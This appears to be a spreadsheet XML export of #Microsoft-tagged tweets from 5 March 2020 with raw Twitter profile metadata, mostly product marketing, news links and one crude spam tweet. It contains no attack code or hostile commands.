    <t>Thank you @mrkazgan CEO @cliexa for joining me on #AskTheCEO on increasing efficiency in #HealthCare with #Microsoft #Azure.
Video to be published 3/9
Subscribe here: https://t.co/zCDQxvA5Rl
@davidhoulding @IrmaRaste @WearablesExpert @enricomolinari @DrJDrooghaag @DigitalFawad https://t.co/D8vBWHK0Z3</t>
  </si>
  <si>
    <t>{'id': 87629909, 'id_str': '87629909', 'name': 'Avrohom Gottheil ðŸ‡ºðŸ‡¸', 'screen_name': 'avrohomg', 'location': 'Spring Valley, NY', 'description': 'CEO at #AskTheCEO Media. Influencer in #AI #IoT #Cloud #Cybersecurity &amp; Emerging Technologies. Technology futurist. #InfluencerMarketing #ThoughtLeadership', 'url': 'https://t.co/mfi1xppvYp', 'entities': {'url': {'urls': [{'url': 'https://t.co/mfi1xppvYp', 'expanded_url': 'https://asktheceo.biz', 'display_url': 'asktheceo.biz', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 18607, 'friends_count': 6733, 'listed_count': 769, 'created_at': 'Thu Nov 05 06:23:49 +0000 2009', 'favourites_count': 80356, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 67364,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'http://pbs.twimg.com/profile_images/1129430659066408963/zA_EYkyv_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1129430659066408963/zA_EYkyv_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/87629909/1573064323',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</si>
  <si>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21:05:12 +0000 2020</t>
  </si>
  <si>
    <t>Is there anyone who likes to lick the clitoris? Want 
 #microsoft #british https://t.co/ggGcgFe3xV</t>
  </si>
  <si>
    <t>{'id': 1235462758990258177, 'id_str': '1235462758990258177', 'name': 'Jamie Gurule', 'screen_name': 'tradrocdirep', 'location': 'Phoenix, USA', 'description': 'Love sayings on images', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 3, 'friends_count': 6, 'listed_count': 0, 'created_at': 'Thu Mar 05 07:11:05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'http://pbs.twimg.com/profile_images/1235463493807153152/QlkrOdtC_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235463493807153152/QlkrOdtC_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235462758990258177/1583392516',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</si>
  <si>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21:01:43 +0000 2020</t>
  </si>
  <si>
    <t>Introducing Microsoft OneDrive and SharePoint, the March themes at SoftwareMedia! This month we will go into depth on what these apps are and how they can be utitlized to increase business outcomes. Stay Tuned! 
#Microsoft #OneDrive #SharePoint #SoftwareMedia https://t.co/Orx5rMtnMU</t>
  </si>
  <si>
    <t>{'id': 30254133, 'id_str': '30254133', 'name': 'SoftwareMedia.com', 'screen_name': 'SoftwareMedia', 'location': 'Salt Lake City, UT', 'description': 'Discount Software with free electronic delivery and satisfaction guaranteed. Follow us for software and hardware news, deals, info, and more.', 'url': 'http://t.co/SH4hVCdwdT', 'entities': {'url': {'urls': [{'url': 'http://t.co/SH4hVCdwdT', 'expanded_url': 'http://www.softwaremedia.com?utm_source=twitter&amp;utm_medium=Link&amp;utm_campaign=', 'display_url': 'softwaremedia.com/?utm_source=twâ€¦', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1166, 'friends_count': 1800, 'listed_count': 52, 'created_at': 'Fri Apr 10 16:41:56 +0000 2009', 'favourites_count': 65, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2105, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'FFFFFF', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme6/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme6/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/3355240143/9b8a334c71dad1072c7ebbe5ce20a54e_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/3355240143/9b8a334c71dad1072c7ebbe5ce20a54e_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/30254133/1572460716', 'profile_link_color': 'F7941E', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': '003A8A', 'profile_text_color': '9E9E9E', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 21:01:24 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft's commitment to customers during the current Covid outbreak - https://t.co/8EofLfIW4p #microsoft #COVID19</t>
  </si>
  <si>
    <t>{'id': 37740370, 'id_str': '37740370', 'name': 'C:\\hristos.matskas - #MakeThingsHappen', 'screen_name': 'ChristosMatskas', 'location': 'Seattle, WA', 'description': "Product Marketing Manager @ Microsoft working on cool things #VS4MAC #mobile &amp; #Gaming. Loves #OSS &amp; platform-agnostic tools. 'Future maker', husband &amp; dad", 'url': 'https://t.co/zvzclP8hg6', 'entities': {'url': {'urls': [{'url': 'https://t.co/zvzclP8hg6', 'expanded_url': 'http://cmatskas.com', 'display_url': 'cmatskas.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4142, 'friends_count': 2947, 'listed_count': 343, 'created_at': 'Mon May 04 19:54:35 +0000 2009', 'favourites_count': 11872, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 31022,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'http://pbs.twimg.com/profile_images/535056913214345216/LpXL2FOi_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/535056913214345216/LpXL2FOi_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/37740370/1471770672',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</si>
  <si>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21:01:17 +0000 2020</t>
  </si>
  <si>
    <t>Calling the #API and Send #Register #User  Request using #AKSoftwareWebApi #Client library in building full client-side #application using #Blazor #WebAssembly @aspnet 
#courses #akacademy #microsoft #education #programming #dotnet #dotnetcore
https://t.co/oZ5eGpAKOx https://t.co/r27Y5yaN9x</t>
  </si>
  <si>
    <t>{'id': 743186361784606721, 'id_str': '743186361784606721', 'name': 'Ahmad Mozaffar', 'screen_name': 'AhmadMozaffar99', 'location': 'Lebanon', 'description': 'Microsofter, MCT, MCSD, MCSA, MCP, Full stack .NET developer, Technology geek, Author in C# Corner', 'url': 'https://t.co/Fj0TKkqO3h', 'entities': {'url': {'urls': [{'url': 'https://t.co/Fj0TKkqO3h', 'expanded_url': 'http://ahmadmozaffar.net', 'display_url': 'ahmadmozaffar.net', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 48, 'friends_count': 335, 'listed_count': 1, 'created_at': 'Wed Jun 15 21:00:11 +0000 2016', 'favourites_count': 567, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 165, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1129050761655128064/0PcgFmxb_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1129050761655128064/0PcgFmxb_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/743186361784606721/1528790306',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</si>
  <si>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#cybersecurity #infosec #microsoft         No matter where your job takes you, Microsoft365 can adapt to your security needs, keeping company information safe without hindering you day to day. https://t.co/M9mwaRxrXL</t>
  </si>
  <si>
    <t>Thu Mar 05 21:00:12 +0000 2020</t>
  </si>
  <si>
    <t>#Teamwork is critical for solving the challenges the world faces today, but teamwork can be a challenge in itself. 
Learn how to improve the dynamics that set teams up for success with this guide: https://t.co/llJRtze3OL
#MicrosoftTeams #Microsoft #technology #collaboration https://t.co/yN08doHPUX</t>
  </si>
  <si>
    <t>{'id': 102546703, 'id_str': '102546703', 'name': 'Microsoft Cloud News', 'screen_name': 'MSFTCloudNews', 'location': 'Los Angeles, CA', 'description': 'News for #Microsoft #Cloud solutions: #Microsoft365 #Office365, #Azure, #PowerBI, #Dynamics365, #MSFTTeams, #SharePoint. Managed by @CoreBTS, #MSFT Gold Partner', 'url': 'https://t.co/BlIUBDSEFL', 'entities': {'url': {'urls': [{'url': 'https://t.co/BlIUBDSEFL', 'expanded_url': 'http://www.corebts.com', 'display_url': 'corebts.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3594, 'friends_count': 957, 'listed_count': 198, 'created_at': 'Thu Jan 07 02:10:43 +0000 2010', 'favourites_count': 686, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5429,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'http://pbs.twimg.com/profile_images/1102946998473371650/yxlEDKba_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1102946998473371650/yxlEDKba_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/102546703/1551797977', 'profile_link_color': '0033A1',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</si>
  <si>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20:59:18 +0000 2020</t>
  </si>
  <si>
    <t>Check out my article for #Microsoft. Three success tips to build a six figure #freelance business https://t.co/3yNKeVT3K7</t>
  </si>
  <si>
    <t>{'id': 124312008, 'id_str': '124312008', 'name': 'Kevin Craine', 'screen_name': 'Kevin_Craine', 'location': 'Portland Oregon', 'description': 'Kevin Craine - Business writer, technology analyst, podcast and video producer, executive coach - Named #1 ECM influencer to follow on Twitter', 'url': 'https://t.co/wY1xGvoM4A', 'entities': {'url': {'urls': [{'url': 'https://t.co/wY1xGvoM4A', 'expanded_url': 'http://CraineGroup.com', 'display_url': 'CraineGroup.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3395, 'friends_count': 2206, 'listed_count': 1887, 'created_at': 'Fri Mar 19 00:19:35 +0000 2010', 'favourites_count': 5702, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 72250,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'http://pbs.twimg.com/profile_images/502186859926011904/c8EiNNkA_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/502186859926011904/c8EiNNkA_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/124312008/1420505036', 'profile_link_color': 'ABB8C2', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': 'EFEFEF', 'profile_text_color': '333333', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 20:56:42 +0000 2020</t>
  </si>
  <si>
    <t>Hundreds of #Microsoft sub-domains open to #hijacking
https://t.co/V5qxhd1JZC
#securityaffairs #hacking</t>
  </si>
  <si>
    <t>Thu Mar 05 20:55:00 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Power Automate #RPA features slated for April https://t.co/Dj1DBXSMSI</t>
  </si>
  <si>
    <t>{'id': 266948715, 'id_str': '266948715', 'name': 'ThriveFast', 'screen_name': 'ThriveFast', 'location': 'Tulsa, OK', 'description': 'ThriveFast is a turnkey web solutions provider specializing in SharePoint / Web development, consulting, and training.', 'url': 'http://t.co/DrYxBeM5ES', 'entities': {'url': {'urls': [{'url': 'http://t.co/DrYxBeM5ES', 'expanded_url': 'http://www.ThriveFast.com', 'display_url': 'ThriveFast.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 131, 'friends_count': 92, 'listed_count': 65, 'created_at': 'Wed Mar 16 02:35:56 +0000 2011', 'favourites_count': 2, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3638,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'http://pbs.twimg.com/profile_images/378800000598762039/eaa6cbc56ff98b4068f67a06a88f0fce_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000598762039/eaa6cbc56ff98b4068f67a06a88f0fce_normal.jpeg',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</si>
  <si>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Mar 05 20:54:46 +0000 2020</t>
  </si>
  <si>
    <t>Good context and coverage on the recent announcement from #Microsoft and others regarding our corporate action on #climate change https://t.co/pKmOoAk9ET</t>
  </si>
  <si>
    <t>{'id': 934603399101743104, 'id_str': '934603399101743104', 'name': 'Paul Maher', 'screen_name': 'PaulJFMaher', 'location': 'Redmond, WA', 'description': 'General Manager @Microsoft. I lead the "Industry Experiences" team in @Azure engineering, helping industry customers and partners be successful using #cloud.', 'url': 'https://t.co/Ddky17sCfk', 'entities': {'url': {'urls': [{'url': 'https://t.co/Ddky17sCfk', 'expanded_url': 'http://www.linkedin.com/in/pauljmaher', 'display_url': 'linkedin.com/in/pauljmaher', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3126, 'friends_count': 4264, 'listed_count': 63, 'created_at': 'Sun Nov 26 02:03:09 +0000 2017', 'favourites_count': 12830, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6430, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/934625876725006336/pJNw2MMn_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/934625876725006336/pJNw2MMn_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/934603399101743104/1514864426',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</si>
  <si>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20:54:42 +0000 2020</t>
  </si>
  <si>
    <t>Looks like more companies ("big names") will join the Baseline Protocol initiative in the near future. Interesting interview with John Wolpert, giving us some background how the initiative was born.
#Unibright $UBT #Consensys #EY #Microsoft 
https://t.co/ySWt5YFCiG</t>
  </si>
  <si>
    <t>{'id': 1148511539395256321, 'id_str': '1148511539395256321', 'name': 'Tommy', 'screen_name': 'vetbtc', 'location': 'Amsterdam', 'description': 'Software developer. Bitcoin, Unibright, VeChain and a nip of whisky. Has almost forgotten the smell of cash.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 107, 'friends_count': 86, 'listed_count': 0, 'created_at': 'Tue Jul 09 08:37:44 +0000 2019', 'favourites_count': 815, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 672, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1176124595369328640/yDrFWAsp_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1176124595369328640/yDrFWAsp_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1148511539395256321/1569244854',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</si>
  <si>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20:52:01 +0000 2020</t>
  </si>
  <si>
    <t>Update #Microsoft #Windows Systems to #Patch 99 New #Security Flaws - https://t.co/WUL34heTTf #vulnerabilities https://t.co/iXaAMdtfa6</t>
  </si>
  <si>
    <t>{'id': 2800599859, 'id_str': '2800599859', 'name': 'Lance Edelman', 'screen_name': 'Lance_Edelman', 'location': 'Atlanta, GA', 'description': '@VallumSoftware, #EdgeComputing #IoT #ITmonitoring #NetworkMonitoring  #NetworkManagement #msp #software #microservices #containers #surveillancecameras #IIoT', 'url': 'http://t.co/XIoalHMUd5', 'entities': {'url': {'urls': [{'url': 'http://t.co/XIoalHMUd5', 'expanded_url': 'http://vallumsoftware.com/', 'display_url': 'vallumsoftware.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2217, 'friends_count': 1594, 'listed_count': 1635, 'created_at': 'Tue Sep 09 21:09:46 +0000 2014', 'favourites_count': 5527, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 33430,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'http://pbs.twimg.com/profile_images/509451923850674176/zlr0xIJo_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/509451923850674176/zlr0xIJo_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2800599859/1431034133',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</si>
  <si>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20:51:03 +0000 2020</t>
  </si>
  <si>
    <t>After #LinkedIn/#Lynda/#SlideShare then #GitHub, it would be logical for #Microsoft to acquire #StackOverflow - building the gorilla of professional social networks one acquisition at a time.</t>
  </si>
  <si>
    <t>{'id': 16185081, 'id_str': '16185081', 'name': 'Jean-Philippe LebÅ“uf', 'screen_name': 'jpleboeuf', 'location': 'Prague, Czech Republic', 'description': '#French R&amp;D engineer (#EPITA &amp; UPS11), originally from #Paris Metropolitan Area, nowadays alter-#FrenchTech #expat-preneur based in #Prague, gardening #startups', 'url': 'https://t.co/9F02jTiL2S', 'entities': {'url': {'urls': [{'url': 'https://t.co/9F02jTiL2S', 'expanded_url': 'https://www.linkedin.com/in/jpleboeuf', 'display_url': 'linkedin.com/in/jpleboeuf', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1364, 'friends_count': 3104, 'listed_count': 221, 'created_at': 'Mon Sep 08 14:38:47 +0000 2008', 'favourites_count': 115386, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3873,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'http://pbs.twimg.com/profile_images/583325896498552832/Yung55c8_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/583325896498552832/Yung55c8_normal.jpg',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</si>
  <si>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20:50:30 +0000 2020</t>
  </si>
  <si>
    <t>#cloud  #microsoft #digitaltransformation     VIA @Microsoft365     5 steps for boosting your digital transformation with Microsoft 365 https://t.co/bDxKQHjb0d</t>
  </si>
  <si>
    <t>Thu Mar 05 20:49:33 +0000 2020</t>
  </si>
  <si>
    <t>Data-driven transformation is a journey that requires adaptability. With #Microsoft #Azure, 6SC delivers the data, security and AI you need to build an agile data estate.
https://t.co/FRUUiUYUPn</t>
  </si>
  <si>
    <t>{'id': 50927216, 'id_str': '50927216', 'name': '6th Street Consulting', 'screen_name': '6sc', 'location': 'Redondo Beach, CA', 'description': '6th Street Consulting is in the business of empowering our clients to achieve more, specializing in user productivity &amp; collaboration on SharePoint &amp; Office 365', 'url': 'http://t.co/7MEfMBTQQW', 'entities': {'url': {'urls': [{'url': 'http://t.co/7MEfMBTQQW', 'expanded_url': 'http://www.6sc.com', 'display_url': '6sc.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 287, 'friends_count': 167, 'listed_count': 12, 'created_at': 'Fri Jun 26 04:50:22 +0000 2009', 'favourites_count': 139, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1000,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'http://pbs.twimg.com/profile_images/1030143963259269122/civ4HPdc_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1030143963259269122/civ4HPdc_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/50927216/1561737966',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</si>
  <si>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20:47:24 +0000 2020</t>
  </si>
  <si>
    <t>The Verge Tech survey is out and provides some interesting insights.  #facebook and #twitter have some big brand issues, not surprising with the political environment.  #Microsoft comes out on top for most trusted. @CaseyNewton @TheVerge https://t.co/oT625dX3Iz</t>
  </si>
  <si>
    <t>{'id': 16132218, 'id_str': '16132218', 'name': 'raykemper', 'screen_name': 'raykemper', 'location': 'Denver, CO', 'description': 'VP Marketing Marketing Excellence l #CMO #marketing l SaaS Technology enthusiast l#cryptocurrency l #bitcoin  #blockchain', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1214, 'friends_count': 1753, 'listed_count': 93, 'created_at': 'Thu Sep 04 17:47:39 +0000 2008', 'favourites_count': 1100, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 921,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'http://pbs.twimg.com/profile_images/981946263670272000/2rbgjfX5_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/981946263670272000/2rbgjfX5_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/16132218/1512444534', 'profile_link_color': '0084B4',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</si>
  <si>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20:45:15 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Office 365 may present a few #security challenges that businesses must address. #CyberSecurity #TechTips #expertIT #SmallBusinessTech
https://t.co/g9PWzFO6Ai</t>
  </si>
  <si>
    <t>{'id': 2176410883, 'id_str': '2176410883', 'name': 'expertIT, Inc.', 'screen_name': 'expertITInc', 'location': 'Grand Rapids, MI', 'description': "You have a #smallbusiness to run. We'll handle the #technology you need to do it. No contracts, no commitments! #GrandRapids #GRMI https://t.co/oMNN950E17", 'url': 'http://t.co/vl3ghugnrk', 'entities': {'url': {'urls': [{'url': 'http://t.co/vl3ghugnrk', 'expanded_url': 'http://www.expertIT.us.com', 'display_url': 'expertIT.us.com', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'https://t.co/oMNN950E17', 'expanded_url': 'http://expertit.us.com', 'display_url': 'expertit.us.com', 'indices': [131, 154]}]}}, 'protected': False, 'followers_count': 1092, 'friends_count': 1555, 'listed_count': 110, 'created_at': 'Tue Nov 05 16:32:00 +0000 2013', 'favourites_count': 141, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1813,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'http://pbs.twimg.com/profile_images/646718491484135424/ANxOj-ds_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/646718491484135424/ANxOj-ds_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2176410883/1511967499',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</si>
  <si>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20:45:07 +0000 2020</t>
  </si>
  <si>
    <t>Save BIG on select @Microsoft Surface products https://t.co/2OxR3ItlXv #Microsoft #Laptop https://t.co/xovmyNzhZu</t>
  </si>
  <si>
    <t>{'id': 44282068, 'id_str': '44282068', 'name': 'BeachCamera', 'screen_name': 'BeachCamera', 'location': 'Edison, NJ', 'description': 'Since 1983, Beach Camera has been all about helping photographers pursue their passions with the latest and greatest in cameras and photography gear.', 'url': 'https://t.co/5t1enBxWiV', 'entities': {'url': {'urls': [{'url': 'https://t.co/5t1enBxWiV', 'expanded_url': 'http://beachcamera.com', 'display_url': 'beachcamera.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3517, 'friends_count': 4719, 'listed_count': 103, 'created_at': 'Wed Jun 03 03:29:21 +0000 2009', 'favourites_count': 245, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 14200,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'http://pbs.twimg.com/profile_images/249707838/twitteravatar_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/249707838/twitteravatar_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/44282068/1583423317', 'profile_link_color': 'FF7140', 'profile_sidebar_border_color': 'F2E195', 'profile_sidebar_fill_color': 'FFFFFF', 'profile_text_color': '0C3E53', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 20:44:09 +0000 2020</t>
  </si>
  <si>
    <t>Oh by the way I'm making a #Microsoft DOS game for the #dosgamesjam using C and a custom made engine. Targeting the 286/386 PCs. Back to the future! #indiedevhour https://t.co/hteX73qFEj</t>
  </si>
  <si>
    <t>{'id': 371727710, 'id_str': '371727710', 'name': 'DiR3Kt', 'screen_name': 'ZappedCow', 'location': 'Switzerland', 'description': 'Geek-O-Dad. Currently making a secret MMO.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 761, 'friends_count': 166, 'listed_count': 34, 'created_at': 'Sun Sep 11 11:56:35 +0000 2011', 'favourites_count': 736, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1768, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'EB6709', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme16/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme16/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1674096891/ZC_twitter_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1674096891/ZC_twitter_normal.png', 'profile_link_color': '91D2FA', 'profile_sidebar_border_color': 'FABE5D', 'profile_sidebar_fill_color': 'FABE5D', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 20:43:31 +0000 2020</t>
  </si>
  <si>
    <t>Still having questions about how we #protect your #data in #Office365? check the video below and you will see our #Encryption at #Rest.
#microsoft365 #cybersecurity #msftadvocate #security #microsoft https://t.co/Zwnxk5g04Y</t>
  </si>
  <si>
    <t>{'id': 47614721, 'id_str': '47614721', 'name': 'Raphael Barini', 'screen_name': 'raphaelbarini', 'location': 'ÃœT: -23.4271783,-46.4811975', 'description': 'Collaboration Technology Solutions Professional at Microsoft for US State and Local Government. Husband, father, geek.', 'url': 'https://t.co/oRsiztIHm3', 'entities': {'url': {'urls': [{'url': 'https://t.co/oRsiztIHm3', 'expanded_url': 'https://www.linkedin.com/in/raphaelbarini', 'display_url': 'linkedin.com/in/raphaelbariâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 306, 'friends_count': 348, 'listed_count': 69, 'created_at': 'Tue Jun 16 12:46:37 +0000 2009', 'favourites_count': 363, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 8497,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'http://pbs.twimg.com/profile_images/1009102804403699712/v3WHQetu_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1009102804403699712/v3WHQetu_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/47614721/1468972250',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</si>
  <si>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20:42:09 +0000 2020</t>
  </si>
  <si>
    <t>Great #iamcp IAMCP-SoCal March meeting today as we listen to Tommy Huynh from Microsoft share about the Partner Developer program #microsoft #mspartner #mspartners #partnersmakemorepossible https://t.co/wwCRTXM3S9</t>
  </si>
  <si>
    <t>{'id': 133852190, 'id_str': '133852190', 'name': 'Eric Klauss', 'screen_name': 'eklaussmentor', 'location': 'Southern California', 'description': '#Sales #fractionalsalesmanagement #salesqb #Technology #SME,  @SCOREMentors Mentor, also #swimming fan&amp; President @IAMCPSoCal #iamcp Partner @PartnerSourceSo', 'url': 'https://t.co/lYEYQkxxEP', 'entities': {'url': {'urls': [{'url': 'https://t.co/lYEYQkxxEP', 'expanded_url': 'http://www.partnersource-it.com', 'display_url': 'partnersource-it.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 723, 'friends_count': 574, 'listed_count': 145, 'created_at': 'Fri Apr 16 20:17:06 +0000 2010', 'favourites_count': 2560, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4310,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'http://pbs.twimg.com/profile_images/1010622613847040002/fRvxjXgA_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1010622613847040002/fRvxjXgA_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/133852190/1421349267',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</si>
  <si>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20:40:58 +0000 2020</t>
  </si>
  <si>
    <t>I support 'Open Adobe PDF in client application' - what do you think? https://t.co/wZYqbjtL17  #microsoft #SharePoint  #Adobe</t>
  </si>
  <si>
    <t>{'id': 330947292, 'id_str': '330947292', 'name': 'Byron Tuckett', 'screen_name': 'byrontuckett', 'location': '', 'description': 'Just a dude building software and playing with clouds', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 48, 'friends_count': 381, 'listed_count': 3, 'created_at': 'Thu Jul 07 12:11:46 +0000 2011', 'favourites_count': 266, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 152,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'http://pbs.twimg.com/profile_images/586104431134969857/6re6frTH_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/586104431134969857/6re6frTH_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/330947292/1428573171',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</si>
  <si>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20:40:23 +0000 2020</t>
  </si>
  <si>
    <t>By 2030, global demand for water will surpass supply by 40%. That's why @Ecolab uses #Microsoft #Azure and #PowerBI to help customers produce better with much less water.  #qualitia #datascience #data #microsoft #video #water https://t.co/x3KuFwROue</t>
  </si>
  <si>
    <t>{'id': 1083038323302678528, 'id_str': '1083038323302678528', 'name': 'Qualitia Energy', 'screen_name': 'QualitiaEnergy', 'location': '', 'description': '', 'url': 'https://t.co/Wfnup6Quvs', 'entities': {'url': {'urls': [{'url': 'https://t.co/Wfnup6Quvs', 'expanded_url': 'http://www.Qualitia.com', 'display_url': 'Qualitia.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 297, 'friends_count': 2391, 'listed_count': 0, 'created_at': 'Wed Jan 09 16:30:32 +0000 2019', 'favourites_count': 649, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1699,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'http://pbs.twimg.com/profile_images/1116472084085927936/adf3PI7N_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1116472084085927936/adf3PI7N_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1083038323302678528/1555355544',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</si>
  <si>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20:38:33 +0000 2020</t>
  </si>
  <si>
